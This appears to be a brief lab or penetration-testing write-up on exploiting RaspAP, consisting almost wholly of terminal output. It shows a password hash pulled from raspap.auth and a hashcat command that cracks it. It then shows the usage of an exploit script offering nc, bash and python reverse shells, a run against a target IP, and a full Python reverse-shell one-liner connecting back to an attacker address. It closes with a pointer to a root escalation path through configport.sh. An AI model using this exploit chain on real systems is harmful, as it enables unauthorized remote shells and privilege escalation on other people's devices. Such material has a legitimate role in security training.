Exploiting Raspap - chaining attacks
Last updated
ββ$ cat raspap.auth
admin
$2y$10$lXJPzK/26d7xtq1uGYyiXOJ904sIopZ7sDoJm/sD3vqcw0FRjcg2yhashcat -a 0 -m 3200 '$2y$10$lXJPzK/26d7xtq1uGYyiXOJ904sIopZ7sDoJm/sD3vqcw0FRjcg2y' /usr/share/wordlists/rockyou.txt --show-------------------------------------------------------------------------------------------------
USAGE: rasp_pwn.py [target_ip] [port] [attacker_ip] [attacker_port] [RaspAP_admin_pass] [payload]
-------------------------------------------------------------------------------------------------
Payload options:
1. nc reverse shell
2. bash reverse shell
3. python reverse shell
-------------------------------------------------------------------------------------------------β$ python3 exploit2.py 192.168.234.97 8091 192.168.45.194 22 secret 3
[!] Using Reverse Shell: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.194",22));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
[!] Sending activation request - Make sure your listener is running . . .
[>>>] Press ENTER to continue . . .
[!] You should have a shell :)
[!] Remember to check sudo -l to see if you can get root through /etc/raspap/lighttpd/configport.sh